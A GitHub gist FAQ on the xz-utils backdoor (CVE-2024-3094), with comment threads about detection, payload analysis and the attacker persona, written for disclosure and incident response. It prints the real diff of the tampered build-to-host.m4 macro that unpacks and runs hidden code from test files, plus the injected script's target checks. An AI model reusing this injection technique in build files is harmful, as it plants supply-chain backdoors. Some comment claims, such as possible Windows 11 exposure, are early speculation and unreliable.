@thesamesam
Last active January 2, 2025 15:08
xz-utils backdoor situation (CVE-2024-3094)

FAQ on the xz-utils backdoor (CVE-2024-3094)

This is a living document. Everything in this document is written in good faith and intended to be accurate, but we don't yet know everything about what's going on.

Background

On March 29th, 2024, a backdoor was discovered in xz-utils, a suite of software that gives developers lossless compression. This package is commonly used for compressing release tarballs, software packages, kernel images, and initramfs images. It is very widely distributed; statistically, your average Linux or macOS system will have it installed for convenience.

This backdoor is very indirect and only shows up when a few known specific criteria are met. Others may yet be discovered! However, this backdoor is at least triggerable by remote unprivileged systems connecting to public SSH ports. This has been seen in the wild, where it gets activated by connections, resulting in performance issues, but we do not yet know what is required to bypass authentication (etc.) with it.

We're reasonably sure the following things need to be true for your system to be vulnerable:

  • You need to be running a distro that uses glibc (for IFUNC)
  • You need to have versions 5.6.0 or 5.6.1 of xz or liblzma installed (xz-utils provides the library liblzma) - likely only true if running a rolling-release distro and updating religiously.
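
The version criterion above can be checked mechanically. This is a minimal sketch, assuming `xz --version` prints the version as the last field of its first line (for example `xz (XZ Utils) 5.4.6`). The helper name `classify_xz_version` is hypothetical. A match only means the installed release is one of the two known-backdoored ones, not that the system is exploitable.

```shell
#!/bin/sh
# classify_xz_version is a hypothetical helper: it prints "affected" for the
# two releases named above (5.6.0 and 5.6.1) and "not-known-affected" otherwise.
classify_xz_version() {
    case "$1" in
        5.6.0|5.6.1) echo "affected" ;;
        *)           echo "not-known-affected" ;;
    esac
}

# Only query the local system if xz is actually installed.
if command -v xz >/dev/null 2>&1; then
    # Assumption: the first line of output ends with the version number.
    installed=$(xz --version | head -n 1 | awk '{print $NF}')
    echo "xz $installed: $(classify_xz_version "$installed")"
fi
```

Distributions that shipped a downgrade under a higher package version will still report the real upstream version here, which is why the sketch asks the binary rather than the package manager.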

We know that the combination of systemd and patched openssh is vulnerable, but pending further analysis of the payload, we cannot be certain that other configurations aren't.

Without wanting to scaremonger, it is important to be clear that at this stage, we got lucky, and there may well be other effects of the infected liblzma.

If you're running a publicly accessible sshd, then you are - as a rule of thumb for those not wanting to read the rest here - likely vulnerable.

If you aren't, it is unknown for now, but you should update as quickly as possible because investigations are continuing.

TL;DR:

  • Using a .deb or .rpm based distro with glibc and xz-5.6.0 or xz-5.6.1:
    • Using systemd on publicly accessible ssh: update RIGHT NOW NOW NOW
    • Otherwise: update RIGHT NOW NOW but prioritize the former
  • Using another type of distribution:
    • With glibc and xz-5.6.0 or xz-5.6.1: update RIGHT NOW, but prioritize the above.

If all of these are the case, please update your systems to mitigate this threat. For more information about affected systems and how to update, please see this article or check the xz-utils page on Repology.

This is not a fault of sshd, systemd, or glibc; that is just how it was made exploitable.

Design

This backdoor has several components. At a high level:

  • The release tarballs upstream publishes don't have the same code that GitHub has. This is common in C projects so that downstream consumers don't need to remember how to run autotools and autoconf. The version of build-to-host.m4 in the release tarballs differs wildly from the upstream on GitHub.
  • There are crafted test files in the tests/ folder within the git repository too. These files are in the following commits:
  • Note that the bad commits have since been reverted in e93e13c8b3bec925c56e0c0b675d8000a0f7f754
  • A script called by build-to-host.m4 that unpacks this malicious test data and uses it to modify the build process.
  • IFUNC, a mechanism in glibc that allows for indirect function calls, is used to perform runtime hooking/redirection of OpenSSH's authentication routines. IFUNC is a tool that is normally used for legitimate things, but in this case it is exploited for this attack path.

Normally upstream publishes release tarballs that are different than the automatically generated ones in GitHub. In these modified tarballs, a malicious version of build-to-host.m4 is included to execute a script during the build process.

This script (at least in versions 5.6.0 and 5.6.1) checks for various conditions like the architecture of the machine. Here is a snippet of the malicious script that gets unpacked by build-to-host.m4 and an explanation of what it does:

if ! (echo "$build" | grep -Eq "^x86_64" > /dev/null 2>&1) && (echo "$build" | grep -Eq "linux-gnu$" > /dev/null 2>&1);then

  • If amd64/x86_64 is the target of the build
  • And if the target uses the name linux-gnu (mostly checks for the use of glibc)
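
The two bullet points describe a predicate over the build triple. This is a minimal sketch that reuses the two grep patterns from the quoted line. The function name `is_targeted_build` and the sample triples are hypothetical. Note that the quoted line negates its first test, while this sketch follows the bullet-point description instead.

```shell
#!/bin/sh
# is_targeted_build is a hypothetical name; the grep patterns are the ones
# from the quoted snippet. Returns 0 (true) only for x86_64 plus linux-gnu.
is_targeted_build() {
    echo "$1" | grep -Eq "^x86_64" && echo "$1" | grep -Eq "linux-gnu$"
}

# Sample triples are illustrative, not taken from the backdoor.
for triple in x86_64-pc-linux-gnu x86_64-pc-linux-musl aarch64-unknown-linux-gnu; do
    if is_targeted_build "$triple"; then
        echo "$triple: targeted"
    else
        echo "$triple: skipped"
    fi
done
```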

It also checks for the toolchain being used:

  if test "x$GCC" != 'xyes' > /dev/null 2>&1;then
  exit 0
  fi
  if test "x$CC" != 'xgcc' > /dev/null 2>&1;then
  exit 0
  fi
  LDv=$LD" -v"
  if ! $LDv 2>&1 | grep -qs 'GNU ld' > /dev/null 2>&1;then
  exit 0
  fi

And if you are trying to build a Debian or Red Hat package:

if test -f "$srcdir/debian/rules" || test "x$RPM_ARCH" = "xx86_64";then

This attack thus seems to be targeted at amd64 systems running glibc using either Debian or Red Hat derived distributions. Other systems may be vulnerable at this time, but we don't know.
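
The packaging check quoted above can be exercised in isolation. This is a minimal sketch that wraps the same two tests in a function and runs it against a throwaway directory tree. The function name `looks_like_distro_package_build` and the directory names are hypothetical, and it takes the RPM architecture as an argument instead of reading `$RPM_ARCH` so that it is easy to try out.

```shell
#!/bin/sh
# looks_like_distro_package_build is a hypothetical name. It mirrors the quoted
# test: a debian/rules file under the source dir, or an RPM arch of x86_64.
looks_like_distro_package_build() {
    srcdir=$1
    rpm_arch=$2
    test -f "$srcdir/debian/rules" || test "x$rpm_arch" = "xx86_64"
}

# Illustrative run against a temporary tree (made-up directory names).
tmp=$(mktemp -d)
mkdir -p "$tmp/deb-src/debian" "$tmp/plain-src"
: > "$tmp/deb-src/debian/rules"

looks_like_distro_package_build "$tmp/deb-src" ""       && echo "deb-src: package build"
looks_like_distro_package_build "$tmp/plain-src" x86_64 && echo "plain-src with RPM arch: package build"
looks_like_distro_package_build "$tmp/plain-src" ""     || echo "plain-src: not a package build"

rm -rf "$tmp"
```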

Lasse Collin, the original long-standing xz maintainer, is currently working on auditing the xz.git.

Design specifics

$ git diff m4/build-to-host.m4 ~/data/xz/xz-5.6.1/m4/build-to-host.m4
diff --git a/m4/build-to-host.m4 b/home/sam/data/xz/xz-5.6.1/m4/build-to-host.m4
index f928e9ab..d5ec3153 100644
--- a/m4/build-to-host.m4
+++ b/home/sam/data/xz/xz-5.6.1/m4/build-to-host.m4
@@ -1,4 +1,4 @@
-# build-to-host.m4 serial 3
+# build-to-host.m4 serial 30
 dnl Copyright (C) 2023-2024 Free Software Foundation, Inc.
 dnl This file is free software; the Free Software Foundation
 dnl gives unlimited permission to copy and/or distribute it,
@@ -37,6 +37,7 @@ AC_DEFUN([gl_BUILD_TO_HOST],
 
   dnl Define somedir_c.
   gl_final_[$1]="$[$1]"
+  gl_[$1]_prefix=`echo $gl_am_configmake | sed "s/.*\.//g"`
   dnl Translate it from build syntax to host syntax.
   case "$build_os" in
     cygwin*)
@@ -58,14 +59,40 @@ AC_DEFUN([gl_BUILD_TO_HOST],
   if test "$[$1]_c_make" = '\"'"${gl_final_[$1]}"'\"'; then
     [$1]_c_make='\"$([$1])\"'
   fi
+  if test "x$gl_am_configmake" != "x"; then
+    gl_[$1]_config='sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2>/dev/null'
+  else
+    gl_[$1]_config=''
+  fi
+  _LT_TAGDECL([], [gl_path_map], [2])dnl
+  _LT_TAGDECL([], [gl_[$1]_prefix], [2])dnl
+  _LT_TAGDECL([], [gl_am_configmake], [2])dnl
+  _LT_TAGDECL([], [[$1]_c_make], [2])dnl
+  _LT_TAGDECL([], [gl_[$1]_config], [2])dnl
   AC_SUBST([$1_c_make])
+
+  dnl If the host conversion code has been placed in $gl_config_gt,
+  dnl instead of duplicating it all over again into config.status,
+  dnl then we will have config.status run $gl_config_gt later, so it
+  dnl needs to know what name is stored there:
+  AC_CONFIG_COMMANDS([build-to-host], [eval $gl_config_gt | $SHELL 2>/dev/null], [gl_config_gt="eval \$gl_[$1]_config"])
 ])
 
 dnl Some initializations for gl_BUILD_TO_HOST.
 AC_DEFUN([gl_BUILD_TO_HOST_INIT],
 [
+  dnl Search for Automake-defined pkg* macros, in the order
+  dnl listed in the Automake 1.10a+ documentation.
+  gl_am_configmake=`grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/ 2>/dev/null`
+  if test -n "$gl_am_configmake"; then
+    HAVE_PKG_CONFIGMAKE=1
+  else
+    HAVE_PKG_CONFIGMAKE=0
+  fi
+
   gl_sed_double_backslashes='s/\\/\\\\/g'
   gl_sed_escape_doublequotes='s/"/\\"/g'
+  gl_path_map='tr "\t \-_" " \t_\-"'
 changequote(,)dnl
   gl_sed_escape_for_make_1="s,\\([ \"&'();<>\\\\\`|]\\),\\\\\\1,g"
 changequote([,])dnl
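
One line in the diff that is easy to read past is `gl_path_map`, a `tr` invocation that swaps tab with space and `-` with `_`. This is a small demonstration on made-up input, assuming a `tr` that treats `\-` as a literal hyphen (GNU tr does). The sample string is hypothetical and not taken from the malicious test file.

```shell
#!/bin/sh
# The tr command exactly as it appears in the modified build-to-host.m4.
gl_path_map='tr "\t \-_" " \t_\-"'

# Hypothetical sample input; the real pipeline feeds a test file through this.
sample='a-b_c d'

# Apply the mapping once and show the resulting bytes.
mapped=$(printf '%s' "$sample" | eval $gl_path_map)
printf '%s\n' "$mapped" | od -c | head -n 1

# The mapping is its own inverse: applying it twice restores the input.
restored=$(printf '%s' "$mapped" | eval $gl_path_map)
[ "$restored" = "$sample" ] && echo "round trip ok"
```

Because the substitution is a simple byte swap, a file passed through it stops looking like a valid compressed stream to casual inspection, yet is trivially restored at build time.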

Payload

If those conditions are met, the payload is injected into the source tree. We have not analyzed this payload in detail. Here are the main things we know:

  • The payload activates if the running program has the process name /usr/sbin/sshd. Systems that put sshd in /usr/bin or another folder may or may not be vulnerable.

  • It may activate in other scenarios too, possibly even unrelated to ssh.

  • We don't entirely know what the payload is intended to do. We are investigating.

  • Successful exploitation does not generate any log entries.

  • Vanilla upstream OpenSSH isn't affected unless one of its dependencies links liblzma.

    • Lennart Poettering had mentioned that it may happen via pam->libselinux->liblzma, and possibly in other cases too, but...
    • libselinux does not link to liblzma. It turns out the confusion was because of an old downstream-only patch in Fedora and a stale dependency in the RPM spec which persisted long beyond its removal.
    • PAM modules are loaded too late in the process AFAIK for this to work (another possible example was pam_fprintd). Solar Designer raised this issue as well on oss-security.
  • The payload is loaded into sshd indirectly. sshd is often patched to support systemd-notify so that other services can start when sshd is running. liblzma is loaded because it's depended on by other parts of libsystemd. This is not the fault of systemd; it is just unfortunate. The patch that most distributions use is available here: openssh/openssh-portable#375.

    • Update: The OpenSSH developers have added non-library integration of the systemd-notify protocol so distributions won't be patching it in via libsystemd support anymore. This change has been committed and will land in OpenSSH-9.8, due around June/July 2024.
  • If this payload is loaded in openssh sshd, the RSA_public_decrypt function will be redirected into a malicious implementation. We have observed that this malicious implementation can be used to bypass authentication. Further research is being done to explain why.

    • Filippo Valsorda has shared analysis indicating that the attacker must supply a key which is verified by the payload and then attacker input is passed to system(), giving remote code execution (RCE).
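
The indirect loading path described above (sshd, then libsystemd, then liblzma) suggests a simple local check: does the dynamic linker resolve liblzma for the sshd binary? This is a minimal sketch, assuming `ldd` is available and that sshd lives at `/usr/sbin/sshd` (both vary by system). `mentions_liblzma` and the `SSHD_PATH` override are hypothetical names. A positive result only shows that liblzma is loaded into sshd, not that the installed liblzma is a backdoored one.

```shell
#!/bin/sh
# mentions_liblzma is a hypothetical helper: it succeeds if ldd-style output
# on stdin references liblzma.
mentions_liblzma() {
    grep -q 'liblzma\.so'
}

# Assumed location; override SSHD_PATH if your distribution differs.
sshd_path=${SSHD_PATH:-/usr/sbin/sshd}

if [ -x "$sshd_path" ] && command -v ldd >/dev/null 2>&1; then
    if ldd "$sshd_path" 2>/dev/null | mentions_liblzma; then
        echo "$sshd_path pulls in liblzma"
    else
        echo "$sshd_path does not appear to load liblzma"
    fi
fi
```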

Tangential xz bits

  • Jia Tan's 328c52da8a2bbb81307644efdb58db2c422d9ba7 commit contained a . in the CMake check for landlock sandboxing support. This caused the check to always fail so landlock support was detected as absent.

    • Hardening of CMake's check_c_source_compiles has been proposed (see Other projects).
  • IFUNC was introduced for crc64 in ee44863ae88e377a5df10db007ba9bfadde3d314 by Hans Jansen.

    • Hans Jansen later went on to ask Debian to update xz-utils in https://bugs.debian.org/1067708, but this is quite a common thing for eager users to do, so it's not necessarily nefarious.

People

We do not want to speculate on the people behind this project in this document. This is not a productive use of our time, and law enforcement will be able to handle identifying those responsible. They are likely patching their systems too.

xz-utils had two maintainers:

  • Lasse Collin (Larhzu) who has maintained xz since the beginning (~2009), and before that, lzma-utils.
  • Jia Tan (JiaT75) who started contributing to xz in the last 2-2.5 years and gained commit access, and then release manager rights, about 1.5 years ago. He was removed on 2024-03-31 as Lasse began the long work ahead of him.

Lasse regularly has internet breaks and was on one of these as this all kicked off. He has posted an update at https://tukaani.org/xz-backdoor/ and is working with the community.

Please be patient with him as he gets up to speed and takes time to analyse the situation carefully.

Misc notes

Analysis of the payload

This is the part which is very much in flux. It's early days yet.

These two especially do a great job of analysing the initial/bash stages:

Other great resources:

Other projects

There are concerns some other projects are affected (either by themselves, or because changes to other projects were made to facilitate the xz backdoor). I want to avoid a witch-hunt, but I'm listing some examples here which have already been linked widely, to give some commentary.

Tangential efforts as a result of this incident

This is for suggesting specific changes which are being considered as a result of this.

Discussions in the wake of this

This is for linking to interesting general discussions, rather than specific changes being suggested (see above).

Non-mailing list proposals:

Acknowledgements

  • Andres Freund who discovered the issue and reported it to linux-distros and then oss-security.
  • All the hard-working security teams helping to coordinate a response and push out fixes.
  • Xe Iaso who resummarized this page for readability.
  • Everybody who has provided me tips privately, in #tukaani, or in comments on this gist.

Meta

Please try to keep comments on the gist constrained to editorial changes I need to make, new sources, etc.

There are various places to theorise & such, please see e.g. https://discord.gg/TPz7gBEE (for both reverse engineering and OSINT). (I'm not associated with that Discord but the link is going around, so...)

Response to questions

  • A few people have asked why Jia Tan followed me (@thesamesam) on GitHub. #tukaani was a small community on IRC before this kicked off (~10 people, currently has ~350). I've been in #tukaani for a few years now. When the move from self-hosted infra to GitHub was being planned and implemented, I was around and starred & followed the new Tukaani org pretty quickly.

  • I'm referenced in one of the commits in the original oss-security post that works around noise from the IFUNC resolver. This was a legitimate issue which applies to IFUNC resolvers in general. The GCC bug it led to (PR114115) has been fixed.

    • On reflection, there may have been a missed opportunity as maybe I should have looked into why I couldn't hit the reported Valgrind problems from Fedora on Gentoo, but this isn't the place for my own reflections nor is it IMO the time yet.

TODO for this doc

  • Add a table of releases + signer?
  • Include the injection script after the macro
  • Mention detection?
  • Explain the bug-autoconf thing maybe wrt serial
  • Explain dist tarballs, why we use them, what they do, link to autotools docs, etc
    • "Explaining the history of it would be very helpful I think. It also explains how a single person was able to insert code in an open source project that no one was able to peer review. It is pragmatically impossible, even if technically possible once you know the problem is there, to peer review a tarball prepared in this manner."

TODO overall

Anyone can and should work on these. I'm just listing them so people have a rough idea of what's left.

  • Ensuring Lasse Collin and xz-utils is supported, even long after the fervour is over
  • Reverse engineering the payload (it's still fairly early days here on this)
    • Once finished, tell people whether:
      • the backdoor did anything else than waiting for connections for RCE, like:
        • call home (send found private keys, etc)
        • load/execute additional rogue code
        • did some other steps to infest the system (like adding users, authorized_keys, etc.) or whether it can be certainly said, that it didn't do so
      • other attack vectors than via sshd were possible
      • whether people (who had the compromised versions) can feel fully safe if they either had sshd not running OR at least not publicly accessible (e.g. because it was behind a firewall, nat, iptables, etc.)
  • Auditing all possibly-tainted xz-utils commits
  • Investigate other paths for sshd to get liblzma in its process (not just via libsystemd, or at least not directly)
    • This is already partly done and it looks like none exist, but it would be nice to be sure.
  • Checking other projects for similar injection mechanisms (e.g. similar build system lines)
  • Diff and review all "golden" upstream tarballs used by distros against the output of creating a tarball from the git tag for all packages.
  • Check other projects which (recently) introduced IFUNC, as suggested by thegrugq.
    • This isn't a bad idea even outside of potential backdoors, given how brittle IFUNC is.
  • ???

References and other reading material

@AN4364364

replying to the large image posted depicting the "Jia Cheong Tan" name

I found a couple open source software copyright notes that include that name that were indexed by search engines, indicating their code (libarchive contributions) made it into some products.

https://www.tcsag.de/fileadmin/user_upload/Information_Open-Source-Software_PES_Pro_IP.pdf
https://amazon-source-code-downloads.s3.amazonaws.com/eero/eero-embedded/eero-oss-attribution-latest.txt

With zero commentary on the true ethnic background of the bad actor, as I don't think that's their real name, I think "Jia Cheong Tan" and "Jia Tan" are useful search terms. Only because they had to have reused it when operating this persona.

@cre0z

cre0z commented Mar 30, 2024

As usual the actor will reveal itself by being most vocal about being innocent.

I personally doubt this would happen given the backdoor appears to be very sophisticated and has taken a lot of time to implement. Thus I can assume that the malicious actor is smart enough to not talk very much.

@snnn

snnn commented Mar 30, 2024

It makes me think of one thing: if you have heard of BinSkim and add it to your build pipelines, then if anyone ever tries to insert a binary *.o file into your build like this, the malicious file at least needs to be compiled with the required security flags to prevent common attacks. It's better than doing nothing.

Also, no Linux distro ever runs any static code analysis when building their packages. Never. Think about how it would be possible to insert clang-analyzer or CodeQL into rpm-build. And even if you do, nobody has enough time to address all the false positives.

On Windows we can use ApiValidator tool and a whitelist txt file to validate if all the Windows APIs the binary uses are in the whitelist. By doing this we can add a safety check in our build pipelines to warn us if a new API call was added. For example, if anyone ever tried to use CreateRemoteThread to create injections to another process, at least we could know that. However, it cannot handle indirect calls. Maybe some kind of static analysis could help us generate a list of parameters of all the GetProcAddress calls.

If your build environment is not in an isolated network, an attacker can host their payload in public cloud storage (like GitHub) and then download it during a build, which makes it hard to trace. For example, Python's manylinux docker images. Even if you have verified the crypto checksums when downloading open source software's source code (like libxcrypt), it doesn't prevent them downloading more data during the build.

@arizvisa

@NuLL3rr0r: ftr, there's also the [email protected] email account from the git logs, even mentioned by the OP, (which "sleuths" seem to have skipped over) that also has a corresponding GH account... but yeah, only internet stalkers care about that crap.

@waterkip

Is there any updated research on the matter yet?

I recommend keeping an eye open here: https://openwall.com/lists/oss-security/2024/03/

@waterkip

@NuLL3rr0r: ftr, there's also the [email protected] email account from the git logs, even mentioned by the OP, (which "sleuths" seem to have skipped over) that also has a corresponding GH account... but yeah, only internet stalkers care about that crap.

I mailmapped the repo yesterday, these are the units they have committed with:

Jia Cheong Tan <[email protected]> Jia Tan <[email protected]>
Jia Cheong Tan <[email protected]> Jia Tan <[email protected]>
Jia Cheong Tan <[email protected]> jiat75 <[email protected]>

@MagpieRYL

I want to do some analysis on samples, which I don't have yet, such as the polluted "sshd" binary or .so files.
Can anyone share one if you have it? Much appreciated!

@DanielRuf

@arizvisa https://github.com/jiat75 is the "real" account, which committed all the time to xz.

You just don't see the PRs and commits there anymore, because the xz repo was disabled by GitHub.

@evokelektrique

Damn

@NuLL3rr0r

@snnn thanks for introducing BinSkim! I did not know about that.

I personally do agree with @arizvisa: let's stop accusing people with similar names or from a certain country, since I as well highly doubt those identities are real identities, and the malicious actor is smart enough to steal someone else's identity.

@NuLL3rr0r

NuLL3rr0r commented Mar 30, 2024

@MagpieRYL you could install a Gentoo instance as I see they still have the ebuilds for 5.6.1 and the infected source archive on their mirrors, but masked it so no one can install it by mistake. But, you can unmask it deliberately and build it from source.

@gh-nate

gh-nate commented Mar 30, 2024

I'm watching some folks reverse engineer the xz backdoor, sharing some preliminary analysis with permission.

The hooked RSA_public_decrypt verifies a signature on the server's host key by a fixed Ed448 key, and then passes a payload to system().

It's RCE, not auth bypass, and gated/unreplayable. — https://bsky.app/profile/filippo.abyssdomain.expert/post/3kowjkx2njy2b

Multiple posts in a thread including ...

Apparently the backdoor reverts back to regular operation if the payload is malformed or the signature from the attacker's key doesn't verify.

Unfortunately, this means that unless a bug is found, we can't write a reliable/reusable over-the-network scanner. — https://bsky.app/profile/filippo.abyssdomain.expert/post/3kowkezwz6g2q

@christoofar

I wonder how many Docker/LXC images that pulled bleeding-edge packages somehow managed to incorporate this in the last month because the tarball was pulled. I have already seen Go programmers that use CGo raise eyebrows, because they often take the shortcut of building from a tarball to make the whole build easier.

@smallxu038

This command can check whether Docker containers are running the affected version of xz.

docker ps -aq | xargs -I {} docker exec {} sh -c 'xz --version || echo "xz not found"' 2>/dev/null

Clearly, this incident has deepened prejudice and discrimination against Chinese people. I would rather believe that it is a pseudonym for an organization, not a real person :(

@DanielRuf

@smallxu038 the origin of the person doesn't matter. And only fools think that it is connected to a specific country.

Even with the version you need more things (see the requirements from the Gist) to be exploitable.

Some people seem to make progress with reverse engineering the payload. Currently there is the assumption that the backdoor allows Remote Code Execution (RCE). See https://bsky.app/profile/filippo.abyssdomain.expert/post/3kowjkx2njy2b for more details.

@wryMitts

wryMitts commented Mar 30, 2024

Windows 11 may be in scope.

Libarchive reviewing Jia Tan commits starting from 2021:
libarchive/libarchive#2103
Windows 11 added Libarchive in 23h2 (released in late 2023/early 2024):
https://support.microsoft.com/en-us/topic/november-14-2023-kb5032190-os-builds-22621-2715-and-22631-2715-f9e3e13c-5e98-42c2-add8-f075841ca812

New! This update adds native support for reading additional archive file formats using the libarchive open-source project, such as:
...
tar.xz
...

The given DLL and support to open tar.xz is observed in earlier versions of Windows 11 including Windows 22H2.

@NuLL3rr0r

Windows 11 may be in scope.

Libarchive reviewing Jia Tan commits starting from 2021: libarchive/libarchive#2103 Windows 11 added Libarchive in 23h2 (released in late 2023/early 2024): https://support.microsoft.com/en-us/topic/november-14-2023-kb5032190-os-builds-22621-2715-and-22631-2715-f9e3e13c-5e98-42c2-add8-f075841ca812

New! This update adds native support for reading additional archive file formats using the libarchive open-source project, such as:
...
tar.xz
...

That would make billions of devices vulnerable!! 🤯

@smallxu038

@smallxu038 the origin of the person doesn't matter. And only fools think that it is connected to a specific country.

Even with the version you need more things (see the requirements from the Gist) to be exploitable.

Some people seem to make progress with reverse engineering the payload. Currently there is the assumption that the backdoor allows Remote Code Execution (RCE). See https://bsky.app/profile/filippo.abyssdomain.expert/post/3kowjkx2njy2b for more details.

Yes, what we need to consider now is how to solve security issues and how to prevent such situations from happening again, rather than attacking people from a certain region. Rational people still make up the majority. This attacker is just one step away from causing greater damage, I am still paying attention to this event, thank you for providing the information.

@DanielRuf

@NuLL3rr0r there is probably no backdoor. Otherwise we would know more.

I would not jump to conclusions here and assume that every touched project has this backdoor. Currently it's about xz version 5.6.0 and 5.6.1.

Other projects and commits have to be checked before anyone can say for sure, if other projects also have malicious code.

@spawel22

@NuLL3rr0r there is probably no backdoor. Otherwise we would know more.

You need to check it first. Wild guessing means nothing.

@DanielRuf

@spawel22 that's what "probably" implies. And my last sentence:

Other projects and commits have to be checked before anyone can say for sure, if other projects also have malicious code.

Check / verify first, post facts afterwards.

@wryMitts

wryMitts commented Mar 30, 2024

Windows 11 22H2 22621.3007 may contain Jia Tan code. See below.
Windows 11 23H2 may contain more; not tested yet.

Windows 10 22h2

Windows 10 22H2 19045.4170 has libarchive dll, but may be too old, before Jia Tan added commits:
C:\Windows\WinSxS\amd64_libarchive-internal ... (need to add in your UUID in path if different)
Or C:\Windows\System32\archiveint.dll
Version 3.5.1.0

Oldest Jia Tan commit to libarchive is 2021, but none of those commits are in 3.5.1
libarchive/libarchive@v3.5.0...v3.5.1
3.5.0 released in 2020. Only small bugfixes, nothing from Jia since then.

Windows 11 22h2

Commits from Jia Tan present!! libarchive/libarchive@v3.5.1...v3.6.2
Code is in use to open tar.xz archives! See link
Windows 11 22H2 22621.3007 contains libarchive 3.6.2.0.

Contains proper strings to match dll version to github version as a sanity check

$ strings archiveint.dll | grep libarchive
libarchive 3.6.2

Xz support compiled in by Microsoft:

$ strings archiveint.dll | grep xz
Can't allocate data for xz decompression
xz initialization failed(%d)
No memory for xz decompression
Truncated xz file body
xz data error (error %d)
xz unknown error %d
xz premature end of stream
archive_write_add_filter_xz
.tar.xz
archive_read_support_compression_xz
archive_read_support_filter_xz
archive_write_add_filter_xz
archive_write_set_compression_xz

Windows 11 23h2

No data available yet, come back later?

@chenrui333

it might be good to also callout this oss-fuzz pr, google/oss-fuzz#10667

@thesamesam
Author

I'm going to mention the oss-fuzz & libarchive because a lot of people keep asking about it but with some commentary next to it. Just going to eat first.

@wryMitts

wryMitts commented Mar 30, 2024

Windows 11 using Jia Tan xz code from libarchive

Initial info

In addition to this info

Windows 11 22H2 22621.3007 support for xz files

Windows 11 explorer.exe loads archiveint.dll only AFTER opening any .xz archive

@cculianu

I just don't want anyone here to say something like "A Chinese/Asian name! These bad Chinese/Asian hackers!!".

That's wrong. It is very very likely that Jia Tan is just a fake identity. We cannot decide the one/ones behind Jia Tan.

Agreed. In fact it's likely the guy isn't Chinese at all and that is 100% misdirection.

@cyclone-github

Simple script to detect if your linux distro is vulnerable to CVE-2024-3094
https://github.com/cyclone-github/scripts/blob/main/xz_cve-2024-3094-detect.sh
(This is a fixed version, with added features, of https://www.openwall.com/lists/oss-security/2024/03/29/4)

@FlyingFathead

FlyingFathead commented Mar 30, 2024

How can we prevent this from happening again in the future?

I'm not sure if this would work in practice, but perhaps there should be an automatic A/B / diff check for the tarball contents against the repository's contents and at least a warning flag alongside the package if the contents between the two aren't matching within a stated version number. It could give some early warning on something being off with the tarball.

Then again, if it's just a warning, most people would probably just ignore it anyway, and that approach might either not cover all scenarios, or make certain aspects over-complex. That being said, if tarball files can contain arbitrary contents that do not match the associated commit or tag in the repository, the discrepancy could be exploited maliciously for users relying on the integrity of those releases. There's a general security aspect to this that might have to be enforced from GitHub's end in the future.
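
A rough sketch of that A/B check, assuming the release tarball has already been unpacked into one directory and the matching git tag exported into another (for example with `git archive`). `tarball_only_or_changed` and the file names in the demo are hypothetical. Autotools tarballs legitimately contain generated files that git does not, so the output is a list to review, not a verdict.

```shell
#!/bin/sh
# tarball_only_or_changed is a hypothetical helper. It lists files that exist
# only in the unpacked tarball, or whose contents differ from the git export.
tarball_only_or_changed() {
    git_dir=$1
    tar_dir=$2
    # diff -rq prints one line per differing or unmatched file. Keep the
    # "Files ... differ" lines and the "Only in <tarball dir>" lines.
    LC_ALL=C diff -rq "$git_dir" "$tar_dir" |
        awk -v t="Only in $tar_dir" \
            'index($0, "Files ") == 1 || index($0, t ":") == 1 || index($0, t "/") == 1'
}

# Illustrative run on a made-up pair of trees.
tmp=$(mktemp -d)
mkdir -p "$tmp/git/m4" "$tmp/tar/m4"
echo 'serial 3'  > "$tmp/git/m4/build-to-host.m4"
echo 'serial 30' > "$tmp/tar/m4/build-to-host.m4"
echo 'generated' > "$tmp/tar/configure"
echo 'same'      > "$tmp/git/README"
echo 'same'      > "$tmp/tar/README"
tarball_only_or_changed "$tmp/git" "$tmp/tar"
rm -rf "$tmp"
```

Files present only in git are deliberately ignored here, since the concern is what the tarball adds or alters.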

The release tarballs upstream publishes don't have the same code that GitHub has. This is common in C projects so that downstream consumers don't need to remember how to run autotools and autoconf. The version of build-to-host.m4 in the release tarballs differs wildly from the upstream on GitHub.

... Which again made the exploit possible to begin with, and serves as a reminder of how convenience tends to lead to lapses in security, and how the overall approach to that might need some serious re-evaluation, especially after major incidents like these.

Just my thoughts on this whole thing, feel free to chime in and/or correct me if I'm wrong.

@thesamesam
Author

I have my own thoughts about post-mortem but I plan on writing that up when we're out of the storm. Not that people need to wait on me, ofc. Just think: a) still in the heat of it; b) it's too soon to reflect properly and in a clear-headed way yet.

@cw-alexcroteau

cw-alexcroteau commented Mar 30, 2024

@thesamesam "We have observed that this malicious implementation can be used to bypass authentication. Further research is being done to explain why."

Based on the latest information, it looks like an RCE (after verifying the key, the payload is sent to system()) rather than an auth bypass, though I haven't confirmed it myself: https://bsky.app/profile/filippo.abyssdomain.expert/post/3kowjkx2njy2b

The sad thing is that it would not be possible to scan for it over the network, because an invalid key or malformed request makes the code fall back to regular operation.
